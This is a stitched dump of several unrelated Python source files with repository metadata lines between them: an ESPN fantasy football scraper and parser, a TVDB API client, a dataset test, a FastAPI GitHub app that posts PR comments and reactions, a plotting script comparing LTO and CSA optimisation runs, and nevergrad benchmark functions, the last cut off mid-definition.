        url = (
            f"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/"
            f"segments/0/leaguedefaults/1?view=kona_player_info"
        )
        return self.get_json(url)

    def players_position(self, pos):
        """
        Gets page with all players by position

        Args:
            pos(str): qb, rb, wr, te, k, etc.

        Returns:
            str: HTML
        """
        url = "http://www.espn.com/nfl/players?position={}&league=nfl"
        return self.get(url.format(pos), encoding="latin1")

    def projections(self, pos, season_year=None, week=0, offset=0):
        """
        Gets page with projections by position

        Args:
            pos: str qb, rb, wr, te, k, etc.
            season_year: int 2017, 2016
            week: int 1, 2, 3
            offset: int 0, 40, 80, etc. (page size is 40)

        Returns:
            str: HTML

        Raises:
            ValueError: on unknown position or out-of-range/misaligned offset

        TODO: revise based on new URL
        """
        pos = pos.lower()
        max_offset = {"qb": 120, "rb": 240, "wr": 360, "te": 160, "dst": 0, "k": 40}
        if pos not in self.SLOT_CATEGORIES:
            raise ValueError("invalid pos {}".format(pos))
        if offset > max_offset.get(pos):
            raise ValueError("invalid offset {}".format(offset))
        if offset % 40 > 0:
            # ESPN pages results in blocks of 40
            raise ValueError("invalid offset {}".format(offset))
        # https://fantasy.espn.com/football/players/projections
        url = "http://games.espn.com/ffl/tools/projections?"
        params = {"slotCategoryId": self.SLOT_CATEGORIES[pos], "startIndex": offset}
        if season_year:
            params["seasonId"] = season_year
        if week:
            params["scoringPeriodId"] = week
        else:
            params["seasonTotals"] = "true"
        return self.get(url, params=params, encoding="latin1")

    def team_roster(self, team_code):
        """
        Gets list of NFL players from ESPN.com

        Args:
            team_code: str 'DEN', 'BUF', etc.

        Returns:
            str: HTML
        """
        url = f"http://www.espn.com/nfl/team/roster/_/name/{team_code}"
        return self.get(url, encoding="latin1")

    def weekly_scoring(self, season_year, week, position):
        """
        Gets weekly fantasy scoring page

        Args:
            season_year (int): 2017, 2016, etc.
            week (int): 1 through 17
            position (str): 'qb', 'wr', etc.

        Returns:
            str: HTML

        Raises:
            ValueError: on unknown position

        TODO: rework for new URL
        """
        if position.lower() not in self.SLOT_CATEGORIES:
            raise ValueError("invalid position: {}".format(position))
        # https://fantasy.espn.com/football/leaders
        url = "http://games.espn.com/ffl/leaders?&"
        params = {
            "scoringPeriodId": week,
            "seasonId": season_year,
            # BUGFIX: previously the raw position string was sent; the API
            # expects the numeric slot category id
            "slotCategoryId": self.SLOT_CATEGORIES[position.lower()],
        }
        return self.get(url, params=params)
class Parser:
    """
    Parse ESPN.com for football stats
    """

    # column headers of ESPN's weekly fantasy scoring table (offense layout);
    # shared by the weekly_scoring* parsers below
    _WEEKLY_SCORING_HEADERS = [
        "c_a",
        "pass_yds",
        "pass_td",
        "pass_int",
        "rush_att",
        "rush_yds",
        "rush_td",
        "rec_rec",
        "rec_yds",
        "rec_td",
        "rec_tar",
        "tpc",
        "fumble",
        "misc_td",
        "fpts",
    ]

    def __init__(self):
        """Creates Parser; attaches a null handler to the module logger."""
        logging.getLogger(__name__).addHandler(logging.NullHandler())

    @staticmethod
    def _val(val):
        """
        Converts non-numeric placeholder ('--') to numeric 0

        Args:
            val: stat cell text

        Returns:
            0 for placeholder cells, otherwise the original value
        """
        if "--" in val:
            return 0
        return val

    @staticmethod
    def adp(content):
        """
        Parses season-long ADP

        Args:
            content: parsed JSON (dict) from the kona_player_info view

        Returns:
            list: of dict
        """
        vals = []
        # top-level player fields to keep
        tl_wanted = [
            "defaultPositionId",
            "firstName",
            "id",
            "lastName",
            "proTeamId",
        ]
        for item in content["players"]:
            api_player = {k: v for k, v in item["player"].items() if k in tl_wanted}
            # flatten PPR/standard rank and auction value; None when missing
            for scoring_type in ["PPR", "STANDARD"]:
                for rank_type in ["rank", "auctionValue"]:
                    key = scoring_type.lower() + "_" + rank_type
                    try:
                        api_player[key] = item["player"]["draftRanksByRankType"][
                            scoring_type
                        ][rank_type]
                    except KeyError:
                        api_player[key] = None
            vals.append(api_player)
        return vals

    def projections(self, content, pos):
        """
        Parses ESPN fantasy football season-long sortable projections page

        Args:
            content: HTML string
            pos: position string ('qb', 'rb', 'wr', 'te', 'flex' or 'k')

        Returns:
            list: of dict (empty for unsupported positions)
        """
        players = []
        soup = BeautifulSoup(content, "lxml")
        if pos.lower() in ["qb", "rb", "wr", "te", "flex"]:
            # NOTE(review): tds[2] is ESPN's combined 'C/A' column which gets
            # split across the first two headers -- confirm att/cmp order
            headers = [
                "pass_att",
                "pass_cmp",
                "pass_yds",
                "pass_td",
                "pass_int",
                "rush_att",
                "rush_yds",
                "rush_td",
                "rec",
                "rec_yds",
                "rec_td",
                "fantasy_points_ppr",
            ]
            for row in soup.findAll("tr", {"class": "pncPlayerRow"}):
                player = {"source": "espn"}
                tds = row.find_all("td")
                # tds[0]: rank
                player["source_position_rank"] = tds[0].text
                # tds[1]: name/team/pos
                link, navstr = list(tds[1].children)[0:2]
                player["source_player_name"] = link.text
                player["source_player_team"], player[
                    "source_player_position"
                ] = navstr.split()[-2:]
                player["source_player_id"] = link.attrs.get("playerid")
                # remaining stat cells; '--' placeholders become 0
                vals = [self._val(td.text) for td in tds[3:]]
                for header, val in zip(headers, tds[2].text.split("/") + vals):
                    player[header] = val
                players.append(player)
        elif pos.lower() == "k":
            for row in soup.findAll("tr", {"class": "pncPlayerRow"}):
                player = {"source": "espn"}
                tds = row.find_all("td")
                # tds[0]: rank
                player["source_position_rank"] = tds[0].text
                # tds[1]: name/team/pos
                link, navstr = list(tds[1].children)[0:2]
                player["source_player_name"] = link.text
                player["source_player_team"], player[
                    "source_player_position"
                ] = navstr.split()[-2:]
                player["source_player_id"] = link.attrs.get("playerid")
                # kickers: only total fantasy points are kept
                player["fantasy_points_ppr"] = self._val(tds[-1].text)
                players.append(player)
        else:
            pass
        return players

    @staticmethod
    def players_position(content, pos):
        """
        Parses page of ESPN players by position

        Args:
            content: HTML string
            pos: position string applied to every parsed player

        Returns:
            list: of dict
        """
        players = []
        soup = BeautifulSoup(content, "lxml")
        # data rows alternate between these two CSS classes
        class_matches = set(["oddrow", "evenrow"])
        for row in soup.find_all("tr"):
            classes = set(row.attrs.get("class", []))
            if class_matches.intersection(classes):
                player = {"source": "espn", "source_player_position": pos}
                tds = row.find_all("td")
                # tds[0]: <a href=".../nfl/player/_/id/2574511/...">name</a>
                player["source_player_name"] = tds[0].text
                link = row.find("a", {"href": re.compile(r"/player/_/")})
                if link:
                    match = re.search(r"\/id\/([0-9]+)", link["href"])
                    if match:
                        player["source_player_id"] = match.group(1)
                # tds[1]: <a href=".../team/_/name/jax/...">team name</a>
                player["source_team_name"] = tds[1].text
                link = row.find("a", {"href": re.compile(r"/team/_/name")})
                if link:
                    match = re.search(r"name/(\w+)/", link["href"])
                    if match:
                        player["source_team_code"] = match.group(1)
                # tds[2]: college name
                player["college"] = tds[2].text
                players.append(player)
        return players

    @staticmethod
    def team_roster(content):
        """
        Parses team roster page into list of player dict

        Args:
            content: HTML of espn nfl team roster page

        Returns:
            list: of dict
        """
        players = []
        soup = BeautifulSoup(content, "lxml")
        for row in soup.find_all("tr"):
            link = row.find("a", {"href": re.compile(r"/nfl/player/_/id/")})
            if link is None:
                # header/spacer rows carry no player link; previously these
                # could raise an uncaught AttributeError
                continue
            try:
                player = {"source": "espn"}
                tds = row.find_all("td")
                if len(tds) != 8:
                    continue
                player["source_player_position"] = tds[2].text
                player["source_player_name"] = link.text
                player["source_player_id"] = link["href"].split("/")[-2]
                players.append(player)
            except ValueError:
                pass
        return players

    @staticmethod
    def _parse_weekly_scoring(content):
        """
        Shared implementation for the weekly_scoring* parsers.

        Args:
            content (str): HTML

        Returns:
            list: of dict
        """
        results = []
        soup = BeautifulSoup(content, "lxml")
        tbl = soup.select("table#playertable_0")[0]
        for row in tbl.find_all("tr", {"id": re.compile(r"plyr")}):
            tds = [td.text for td in row.find_all("td", class_="playertableStat")]
            if tds:
                player = dict(zip(Parser._WEEKLY_SCORING_HEADERS, tds))
                # name/team/position live in a mixed text+tag cell
                nametd = row.find("td", {"id": re.compile(r"playername")})
                for child in nametd.children:
                    if isinstance(child, NavigableString):
                        player["source_player_team"], player[
                            "source_player_position"
                        ] = child.string.split()[1:3]
                    elif isinstance(child, Tag):
                        player["source_player_name"] = child.string
                        player["source_player_id"] = child.attrs.get("playerid")
                results.append(player)
        return results

    @staticmethod
    def weekly_scoring(content):
        """
        Parses weekly scoring page

        Args:
            content (str): HTML

        Returns:
            list: of dict
        """
        return Parser._parse_weekly_scoring(content)

    @staticmethod
    def weekly_scoring_dst(content):
        """
        Parses weekly scoring page for dst

        Args:
            content(str): HTML

        Returns:
            list: of dict

        TODO: headers are offense-oriented; adapt for D/ST columns
        """
        return Parser._parse_weekly_scoring(content)

    @staticmethod
    def weekly_scoring_k(content):
        """
        Parses weekly scoring page for kickers

        Args:
            content (str): HTML

        Returns:
            list: of dict

        TODO: headers are offense-oriented; adapt for kicker columns
        """
        return Parser._parse_weekly_scoring(content)
class Agent:
    """
    Combines common scraping/parsing tasks
    """

    def __init__(self, scraper=None, parser=None, cache_name="espn-agent"):
        """
        Creates Agent object

        Args:
            scraper(espn.Scraper): default None (a fresh Scraper is built)
            parser(espn.Parser): default None (a fresh Parser is built)
            cache_name(str): default 'espn-agent'
        """
        logging.getLogger(__name__).addHandler(logging.NullHandler())
        self._s = scraper if scraper else Scraper(cache_name=cache_name)
        self._p = parser if parser else Parser()

    def adp(self, season_year):
        """
        Gets season ADP data

        Args:
            season_year(int): 2018, 2019, etc.

        Returns:
            list: of dict
        """
        return self._p.adp(self._s.adp(season_year))
class Xref(Site):
    """
    Cross-reference source players with other names/ids
    """

    def __init__(self, source_name="espn"):
        """
        Args:
            source_name(str): either 'espn' or 'espn_fantasy'
        """
        super().__init__()
        # identifier the Site machinery uses to tag this data source
        self.source_name = source_name
if __name__ == "__main__":
pass
| 2.15625 | 2 |
common/utils/api_utils.py | hvsuchitra/tv_tracker | 0 | 12797512 | <gh_stars>0
import requests
import requests_cache
# path when running from gui
requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400)
# requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400)
resource_base_url = 'https://thetvdb.com'
api_base_url = 'https://api.thetvdb.com'
resource_base_url_per_ep = 'https://thetvdb.com/banners/'
headers = {}
def get_jwt():
    """Log in to the TVDB API and cache the JWT in the module-level `headers`.

    Returns the token string on HTTP 200; otherwise implicitly returns None
    and leaves `headers` untouched.
    NOTE(review): the credential values below are placeholders and must be
    replaced with real ones for the login to succeed.
    """
    data = {'apikey': 'api_key', 'username': 'username',
            'userkey': 'user_key'}
    # always hit the network for login; never serve a cached token
    with requests_cache.disabled():
        response = requests.post(f'{api_base_url}/login', json=data)
    if response.status_code == 200:
        global headers
        jwt = response.json()['token']
        headers['Authorization'] = f'Bearer {jwt}'
        return jwt
def search_show(show_name):
    """Generator of show dicts matching *show_name* via the TVDB search API.

    NOTE(review): because of ``yield from`` this is a generator -- the HTTP
    request only happens when the first value is consumed, and a failed
    search ('Error' in the payload) simply yields nothing (the early
    ``return None`` just ends the generator).
    """
    shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json()
    cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired')
    if shows.get('Error'): return None
    # substitute 'Not Available' for any missing/null column value
    yield from (
        dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not Available' for col in cols_needed)))
        for
        show in shows['data'])
def get_image(url):
    """Fetch raw image bytes for a site-relative *url* (served from the cache when fresh)."""
    return requests.get(resource_base_url + url, headers=headers).content
def get_episode_count(show_id):
    """Return (season_list, episode_count) for *show_id*.

    NOTE(review): relies on the ordering of the JSON 'data' object's values --
    the first two are assumed to be the seasons list and the episode total;
    verify against the /episodes/summary response schema.
    """
    url = f'{api_base_url}/series/{show_id}/episodes/summary'
    response_json = requests.get(url, headers=headers).json()
    season_list, episode_count, *_ = response_json['data'].values()
    return season_list, int(episode_count)
def get_image_per_ep(url):
    """Fetch raw episode-image bytes for a banner-relative *url*."""
    return requests.get(resource_base_url_per_ep + url, headers=headers).content
get_jwt()
| 1.265625 | 1 |
tests/r/test_rep_vict.py | hajime9652/observations | 199 | 12797520 | <filename>tests/r/test_rep_vict.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.rep_vict import rep_vict
def test_rep_vict():
  """Test module rep_vict.py by downloading
  rep_vict.csv and testing shape of
  extracted data has 8 rows and 8 columns
  """
  test_path = tempfile.mkdtemp()
  # try/finally: the previous version leaked the temp dir on success and
  # used `raise()` (raises a bare tuple -> TypeError) instead of re-raising
  try:
    x_train, metadata = rep_vict(test_path)
    assert x_train.shape == (8, 8)
  finally:
    shutil.rmtree(test_path)
| 1.242188 | 1 |
python/hello-python.py | bobby-web/programlang | 0 | 12797528 | print("Hllo World") | -0.235352 | 0 |
app/api/index.py | awtkns/openapi-perf-action | 0 | 12797536 | import os
from fastapi import FastAPI, HTTPException
from github3.exceptions import NotFoundError, ForbiddenError
from github3.github import GitHub
from github3.pulls import PullRequest
from pydantic import BaseModel
GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None)
GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None)
if not GITHUB_PRIVATE_KEY:
GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read()
app = FastAPI()
class ActionIn(BaseModel):
    """Request payload identifying a pull request and the content to post."""
    content: str  # comment body, or reaction name (e.g. '+1', 'heart')
    owner: str  # repository owner login
    repository: str  # repository name (without owner)
    pr_number: int  # pull request number within the repository

    @property
    def repo(self) -> str:
        """Return the 'owner/repository' slug."""
        return f'{self.owner}/{self.repository}'
@app.post('/comment')
def comment_on_pr(action: ActionIn):
    """Post *action.content* as a comment on the referenced pull request."""
    gh = login_as_installation(action)
    get_pr(gh, action).create_comment(action.content)
    # NOTE(review): FastAPI serializes this tuple as a JSON array; it does
    # not set the HTTP status code -- confirm this is intended
    return "Post Success", 200
@app.post('/reaction')
def react_to_pr(action: ActionIn):
    """Add a reaction (*action.content*, e.g. '+1') to the referenced PR's issue."""
    gh = login_as_installation(action)
    issue = get_pr(gh, action).issue()
    # HACK: posts directly to the issue's /reactions endpoint via private
    # github3.py attributes, with the reactions preview media type
    issue._post(
        issue._api + '/reactions',
        data={"content": action.content},
        headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'}
    )
    return "Post Success", 200
def login_as_installation(action: ActionIn):
    """Return a GitHub client authenticated as this app's installation on action.repo.

    Raises:
        HTTPException: 404 if the app is not installed on the repository.
    """
    try:
        gh = GitHub()
        # first authenticate as the GitHub App itself, then as its
        # installation on the target repository
        gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER)
        install = gh.app_installation_for_repository(action.owner, action.repository)
        gh.login_as_app_installation(
            GITHUB_PRIVATE_KEY.encode(),
            GITHUB_APP_IDENTIFIER,
            install.id
        )
        return gh
    except NotFoundError:
        # NOTE(review): "OpeAPI" looks like a typo for "OpenAPI" in this message
        raise HTTPException(404, f"OpeAPI Perf App not installed to {action.repo}")
def get_pr(gh, action: ActionIn) -> PullRequest:
    """Fetch the pull request referenced by *action* using client *gh*.

    Raises:
        HTTPException: 403 when access is forbidden, 404 when the PR is missing.
    """
    try:
        return gh.pull_request(
            owner=action.owner,
            repository=action.repository,
            number=action.pr_number
        )
    except ForbiddenError:
        raise HTTPException(403, f"Application not setup for the repository {action.repo}")
    except NotFoundError:
        raise HTTPException(404, f"PR #{action.pr_number} does not exist in {action.repo}")
| 1.40625 | 1 |
scripts/plot_performance.py | shercklo/LTO-CMA | 7 | 12797544 | <reponame>shercklo/LTO-CMA
import os
import json
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import argparse
from datetime import datetime
sns.set()
from matplotlib import rcParams
rcParams["font.size"] = "40"
rcParams['text.usetex'] = False
rcParams['font.family'] = 'serif'
rcParams['figure.figsize'] = (16.0, 9.0)
rcParams['figure.frameon'] = True
rcParams['figure.edgecolor'] = 'k'
rcParams['grid.color'] = 'k'
rcParams['grid.linestyle'] = ':'
rcParams['grid.linewidth'] = 0.5
rcParams['axes.linewidth'] = 3
rcParams['axes.edgecolor'] = 'k'
rcParams['axes.grid.which'] = 'both'
rcParams['legend.frameon'] = 'True'
rcParams['legend.framealpha'] = 1
rcParams['legend.fontsize'] = 30
rcParams['ytick.major.size'] = 32
rcParams['ytick.major.width'] = 6
rcParams['ytick.minor.size'] = 6
rcParams['ytick.minor.width'] = 1
rcParams['xtick.major.size'] = 32
rcParams['xtick.major.width'] = 6
rcParams['xtick.minor.size'] = 6
rcParams['xtick.minor.width'] = 1
rcParams['xtick.labelsize'] = 32
rcParams['ytick.labelsize'] = 32
def dir_path(path):
    """argparse ``type=`` validator: return *path* if it is an existing file.

    Raises:
        argparse.ArgumentTypeError: when *path* does not point to a file.
        (Despite the historical name, this checks for a *file*, not a dir.)
    """
    if not os.path.isfile(path):
        raise argparse.ArgumentTypeError("readable_dir:%s is not a valid path to a file" % path)
    return path
parser = argparse.ArgumentParser(description='Script to plot LTO test data.')
parser.add_argument('--lto_path', type=dir_path, help="Path to the LTO data file.",
default=os.path.join("..","examples","10BBOB","GallaghersGaussian21hi_LTO.json"))
parser.add_argument('--csa_path', type=dir_path, help="Path to the CSA data file.",
default=os.path.join("..","data","PPSN_LTO_Data","CSA_Data","CSA_Plots_10D","GallaghersGaussian21hi.json"))
parser.add_argument('--function', type=str, help="Function being plotted",
default="GallaghersGaussian21hi")
args = parser.parse_args()
lto_path = args.lto_path
csa_path = args.csa_path
function = args.function
popsize = 10
data_LTO = {}
data_CSA = {}
with open(lto_path) as json_file:
data_LTO = json.load(json_file)
with open(csa_path) as json_file:
data_CSA = json.load(json_file)
generations = len(data_LTO["Average costs LTO"])
num_feval = generations * popsize
plt.tick_params(axis='x', which='minor')
plt.legend(loc=0, fontsize=25, ncol=2)
plt.xlabel("Num FEval", fontsize=50)
plt.ylabel("Step Size", fontsize=50)
plt.xticks(np.arange(start=1, stop=generations, step=generations//5),
[str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)])
plt.xticks()
plt.title(function)
plt.fill_between(list(np.arange(1, len(data_LTO["Sigma LTO"]) + 1)),
np.subtract(data_LTO["Sigma LTO"], data_LTO["Std Sigma LTO"]),
np.add(data_LTO["Sigma LTO"], data_LTO["Std Sigma LTO"]),
color=sns.xkcd_rgb["magenta"], alpha=0.1)
plt.plot(list(np.arange(1, len(data_LTO["Sigma LTO"]) + 1)), data_LTO["Sigma LTO"], linewidth=4,
label="LTO", color=sns.xkcd_rgb["magenta"])
plt.fill_between(list(np.arange(1, len(data_CSA["Sigma CSA"]) + 1)),
np.subtract(data_CSA["Sigma CSA"], data_CSA["Std Sigma CSA"]),
np.add(data_CSA["Sigma CSA"], data_CSA["Std Sigma CSA"]),
color=sns.xkcd_rgb["green"], alpha=0.1)
plt.plot(list(np.arange(1, len(data_CSA["Sigma CSA"]) + 1)), data_CSA["Sigma CSA"], linewidth=4,
label="CSA", color=sns.xkcd_rgb["green"])
plt.legend()
type = "StepSize"
output_path = os.path.join("..","plots")
os.makedirs(output_path, exist_ok=True)
timestamp = datetime.now()
time = str(timestamp)
plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time))
plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight')
plt.clf()
plt.tick_params(axis='x', which='minor')
plt.legend(loc=0, fontsize=25, ncol=2)
plt.xlabel("Num FEval", fontsize=50)
plt.ylabel("Objective Value", fontsize=50)
plt.xscale("log")
plt.title(function)
plt.xticks(np.arange(start=1, stop=generations, step=generations//5),
[str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)])
plt.fill_between(list(np.arange(1, len(data_LTO["Average costs LTO"]) + 1)),
np.subtract(data_LTO["Average costs LTO"], data_LTO["Std costs LTO"]),
np.add(data_LTO["Average costs LTO"], data_LTO["Std costs LTO"]), alpha=0.1,
color=sns.xkcd_rgb["magenta"])
plt.plot(list(np.arange(1, len(data_LTO["Average costs LTO"]) + 1)), data_LTO["Average costs LTO"],
linewidth=4, label="LTO", color=sns.xkcd_rgb["magenta"])
plt.fill_between(list(np.arange(1, len(data_CSA["Average costs CSA"]) + 1)),
np.subtract(data_CSA["Average costs CSA"], data_CSA["Std costs CSA"]),
np.add(data_CSA["Average costs CSA"], data_CSA["Std costs CSA"]), alpha=0.1,
color=sns.xkcd_rgb["green"])
plt.plot(list(np.arange(1, len(data_CSA["Average costs CSA"]) + 1)), data_CSA["Average costs CSA"],
linewidth=4, label="CSA", color=sns.xkcd_rgb["green"])
plt.legend()
type = "ObjectiveValue"
timestamp = datetime.now()
time = str(timestamp)
plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time))
plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight')
plt.clf()
| 1.296875 | 1 |
nevergrad/functions/corefuncs.py | akhti/nevergrad | 1 | 12797552 | <reponame>akhti/nevergrad<filename>nevergrad/functions/corefuncs.py<gh_stars>1-10
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import time
from typing import Dict, Any, Tuple, List, Callable
import numpy as np
from .utils import PostponedObject
from ..instrumentation import discretization
from ..common.decorators import Registry
registry = Registry[Callable[[np.ndarray], float]]()
def _onemax(x: List[int]) -> float:
"""onemax(x) is the most classical case of discrete functions, adapted to minimization.
It is originally designed for lists of bits. It just counts the number of 1,
and returns len(x) - number of ones..
It also works in the continuous case but in that cases discretizes the
input domain by ]0.5,1.5] --> 1 and 0 everywhere else.
"""
return len(x) - sum(1 if int(round(w)) == 1 else 0 for w in x)
def _leadingones(x: List[int]) -> float:
"""leadingones is the second most classical discrete function, adapted for minimization.
Returns len(x) - number of initial 1. I.e.
leadingones([0 1 1 1]) = 4,
leadingones([1 1 1 1]) = 0,
leadingones([1 0 0 0]) = 1.
"""
for i, x_ in enumerate(list(x)):
if int(round(x_)) != 1:
return len(x) - i
return 0
def _jump(x: List[int]) -> float: # TODO: docstring?
"""There exists variants of jump functions; we are in minimization.
The principle of a jump function is that local descent does not succeed.
Jumps are necessary.
"""
n = len(x)
m = n // 4
o = n - _onemax(x)
if o == n or o <= n - m:
return n - m - o
return o # Deceptive part.
def _styblinksitang(x: np.ndarray, noise: float) -> float:
"""Classical function for testing noisy optimization."""
x = np.asarray(x)
val = np.sum(np.power(x, 4) - 16 * np.power(x, 2) + 5 * x)
# return a positive value for maximization
return float(39.16599 * len(x) + 1 * 0.5 * val + noise * np.random.normal(size=val.shape))
@registry.register
def delayedsphere(x: np.ndarray) -> float:
    '''For asynchronous experiments, we induce delays.'''
    # sleep time shrinks as |x[0]| grows; guarded so x[0] == 0 sleeps 0s
    time.sleep(abs(1./x[0]) / 100000. if x[0] != 0. else 0.)
    return float(np.sum(x**2))

class DelayedSphere(PostponedObject):
    """Sphere function whose scheduling delay grows as x[0] approaches 0."""

    def __call__(self, x: np.ndarray) -> float:
        return float(np.sum(x**2))

    def get_postponing_delay(self, args: Tuple[Any, ...], kwargs: Dict[str, Any], value: float) -> float:
        # delay in "time units"; zero when the first coordinate is exactly 0
        x = args[0]
        return float(abs(1./x[0]) / 1000.) if x[0] != 0. else 0.

registry.register(DelayedSphere())
@registry.register
def sphere(x: np.ndarray) -> float:
    """The most classical continuous optimization testbed (optimum at 0).
    If you do not solve that one then you have a bug."""
    return float(np.sum(x**2))

@registry.register
def sphere1(x: np.ndarray) -> float:
    """Translated sphere function (optimum at x = 1)."""
    return float(np.sum((x - 1.)**2))

@registry.register
def sphere2(x: np.ndarray) -> float:
    """A bit more translated sphere function (optimum at x = 2)."""
    return float(np.sum((x - 2.)**2))

@registry.register
def sphere4(x: np.ndarray) -> float:
    """Even more translated sphere function (optimum at x = 4)."""
    return float(np.sum((x - 4.)**2))
@registry.register
def maxdeceptive(x: np.ndarray) -> float:
    """Max over coordinates of a per-coordinate deceptive landscape."""
    # quadratic bowl minus a narrow well centered near x = 2
    dec = 3 * x**2 - (2 / (3**(x - 2)**2 + .1))
    return float(np.max(dec))

@registry.register
def sumdeceptive(x: np.ndarray) -> float:
    """Sum over coordinates of the same deceptive landscape as maxdeceptive."""
    dec = 3 * x**2 - (2 / (3**(x - 2)**2 + .1))
    return float(np.sum(dec))
@registry.register
def altcigar(x: np.ndarray) -> float:
    """Similar to cigar, but variables in inverse order.
    E.g. for pointing out algorithms not invariant to the order of variables."""
    return float(x[-1]**2 + 1000000. * np.sum(x[:-1]**2))

@registry.register
def cigar(x: np.ndarray) -> float:
    """Classical example of ill conditioned function (condition number 1e6).
    The other classical example is ellipsoid.
    """
    return float(x[0]**2 + 1000000. * np.sum(x[1:]**2))

@registry.register
def altellipsoid(y: np.ndarray) -> float:
    """Similar to Ellipsoid, but variables in inverse order.
    E.g. for pointing out algorithms not invariant to the order of variables."""
    x = y[::-1]
    return sum((10**(6 * (i - 1) / float(len(x) - 1))) * (x[i]**2) for i in range(len(x)))

@registry.register
def ellipsoid(x: np.ndarray) -> float:
    """Classical example of ill conditioned function.
    The other classical example is cigar.
    NOTE(review): the exponent uses (i - 1) rather than the usual i, and the
    division by len(x) - 1 raises ZeroDivisionError for 1-d inputs -- confirm
    both are intended.
    """
    return sum((10**(6 * (i - 1) / float(len(x) - 1))) * (x[i]**2) for i in range(len(x)))
@registry.register
def rastrigin(x: np.ndarray) -> float:
    """Classical multimodal function: sphere plus a cosine ripple term."""
    cosi = float(np.sum(np.cos(2 * np.pi * x)))
    return float(10 * (len(x) - cosi) + sphere(x))

@registry.register
def hm(x: np.ndarray) -> float:
    """New multimodal function (proposed for Nevergrad); oscillates via cos(1/x)."""
    return float(np.sum((x**2) * (1.1 + np.cos(1. / x))))
@registry.register
def rosenbrock(x: np.ndarray) -> float:
    """Classical banana-valley function (optimum at all ones).

    Cast to ``float`` so the return type matches the annotation and the other
    registered functions (previously this returned a numpy scalar).
    """
    return float(sum(100.0*(x[1:] - x[:-1]**2.0)**2.0 + (1 - x[:-1])**2.0))
@registry.register
def griewank(x: np.ndarray) -> float:
    """Multimodal function, often used in Bayesian optimization."""
    part1 = np.sum(x**2)
    # product of cos(x_i / sqrt(i + 1)), i starting at 0
    part2 = np.prod(np.cos(x / np.sqrt(1 + np.arange(len(x)))))
    return 1 + (float(part1)/4000.0) - float(part2)
@registry.register
def deceptiveillcond(x: np.ndarray) -> float:
    """An extreme ill conditioned functions. Most algorithms fail on this.
    The condition number increases to infinity as we get closer to the optimum.
    Returns +inf on the x[0] == 0 axis; requires at least 2 dimensions."""
    assert len(x) >= 2
    return float(max(np.abs(np.arctan(x[1]/x[0])),
                     np.sqrt(x[0]**2. + x[1]**2.),
                     1. if x[0] > 0 else 0.) if x[0] != 0. else float("inf"))
@registry.register
def deceptivepath(x: np.ndarray) -> float:
    """A function which needs following a long path. Most algorithms fail on this.
    The path becomes thiner as we get closer to the optimum."""
    assert len(x) >= 2
    distance = np.sqrt(x[0]**2 + x[1]**2)
    if distance == 0.:
        return 0.
    angle = np.arctan(x[0] / x[1]) if x[1] != 0. else np.pi / 2.
    invdistance = (1. / distance) if distance > 0. else 0.
    # off the spiral path (angle mismatch) the function is flat at 1
    if np.abs(np.cos(invdistance) - angle) > 0.1:
        return 1.
    return float(distance)
@registry.register
def deceptivemultimodal(x: np.ndarray) -> float:
    """Infinitely many local optima, as we get closer to the optimum.
    Identical to deceptivepath except invdistance is truncated to int,
    which creates the discrete rings of local optima."""
    assert len(x) >= 2
    distance = np.sqrt(x[0]**2 + x[1]**2)
    if distance == 0.:
        return 0.
    angle = np.arctan(x[0] / x[1]) if x[1] != 0. else np.pi / 2.
    invdistance = int(1. / distance) if distance > 0. else 0.
    if np.abs(np.cos(invdistance) - angle) > 0.1:
        return 1.
    return float(distance)
@registry.register
def lunacek(x: np.ndarray) -> float:
    """Multimodal function (double-sphere plus Rastrigin-style ripple).
    Based on https://www.cs.unm.edu/~neal.holts/dga/benchmarkFunction/lunacek.html."""
    problemDimensions = len(x)
    # s and mu2 follow the reference parameterization with d = 1, mu1 = 2.5
    s = 1.0 - (1.0 / (2.0 * np.sqrt(problemDimensions + 20.0) - 8.2))
    mu1 = 2.5
    mu2 = - np.sqrt(abs((mu1**2 - 1.0) / s))
    firstSum = 0.0
    secondSum = 0.0
    thirdSum = 0.0
    for i in range(problemDimensions):
        firstSum += (x[i]-mu1)**2
        secondSum += (x[i]-mu2)**2
        thirdSum += 1.0 - np.cos(2*np.pi*(x[i]-mu1))
    # min of the two sphere basins, plus the oscillatory penalty
    return min(firstSum, 1.0*problemDimensions + secondSum)+10*thirdSum
# following functions using discretization should not be used with translation/rotation
# (the threshold discretization below maps reals to integers by fixed cutoffs)

@registry.register_with_info(no_transfrom=True)
def hardonemax(y: np.ndarray) -> float:
    """Onemax, with a discretization in 2 by threshold 0 (>0 or <0)."""
    return _onemax(discretization.threshold_discretization(y))

@registry.register_with_info(no_transfrom=True)
def hardjump(y: np.ndarray) -> float:
    """Hardjump, with a discretization in 2 by threshold 0 (>0 or <0)."""
    return _jump(discretization.threshold_discretization(y))

@registry.register_with_info(no_transfrom=True)
def hardleadingones(y: np.ndarray) -> float:
    """Leading ones, with a discretization in 2 by threshold 0 (>0 or <0)."""
    return _leadingones(discretization.threshold_discretization(y))

@registry.register_with_info(no_transfrom=True)
def hardonemax5(y: np.ndarray) -> float:
    """Hardonemax, with a discretization by 5 with 4 thresholds (quantiles of Gaussian)."""
    return _onemax(discretization.threshold_discretization(y, 5))

@registry.register_with_info(no_transfrom=True)
def hardjump5(y: np.ndarray) -> float:
